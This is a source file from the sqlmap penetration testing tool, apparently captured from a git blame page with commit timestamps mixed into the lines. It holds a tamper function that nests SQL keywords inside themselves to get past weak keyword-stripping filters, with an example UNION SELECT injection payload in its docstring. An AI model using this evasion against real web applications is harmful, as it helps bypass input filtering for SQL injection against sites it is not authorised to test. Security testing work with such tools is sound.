2013-02-14 15:32:17 +04:00
|
|
|
#!/usr/bin/env python
|
2012-09-06 15:14:20 +04:00
|
|
|
|
|
|
|
"""
|
2017-01-02 16:19:18 +03:00
|
|
|
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
2012-09-06 15:14:20 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
|
|
|
"""
|
|
|
|
|
|
|
|
import random
|
|
|
|
import re
|
|
|
|
|
|
|
|
from lib.core.common import singleTimeWarnMessage
|
|
|
|
from lib.core.enums import PRIORITY
|
|
|
|
|
|
|
|
__priority__ = PRIORITY.NORMAL
|
|
|
|
|
2012-12-03 17:27:01 +04:00
|
|
|
def tamper(payload, **kwargs):
|
2012-09-06 15:14:20 +04:00
|
|
|
"""
|
|
|
|
Replaces predefined SQL keywords with representations
|
|
|
|
suitable for replacement (e.g. .replace("SELECT", "")) filters
|
|
|
|
|
|
|
|
Notes:
|
|
|
|
* Useful to bypass very weak custom filters
|
2013-03-14 00:57:09 +04:00
|
|
|
|
|
|
|
>>> random.seed(0)
|
|
|
|
>>> tamper('1 UNION SELECT 2--')
|
|
|
|
'1 UNIOUNIONN SELESELECTCT 2--'
|
2012-09-06 15:14:20 +04:00
|
|
|
"""
|
|
|
|
|
|
|
|
keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")
|
|
|
|
retVal = payload
|
|
|
|
|
|
|
|
warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords)
|
|
|
|
warnMsg += "You can set it manually according to your needs"
|
|
|
|
singleTimeWarnMessage(warnMsg)
|
|
|
|
|
|
|
|
if payload:
|
|
|
|
for keyword in keywords:
|
|
|
|
_ = random.randint(1, len(keyword) - 1)
|
|
|
|
retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal)
|
|
|
|
|
2012-10-25 12:10:23 +04:00
|
|
|
return retVal
|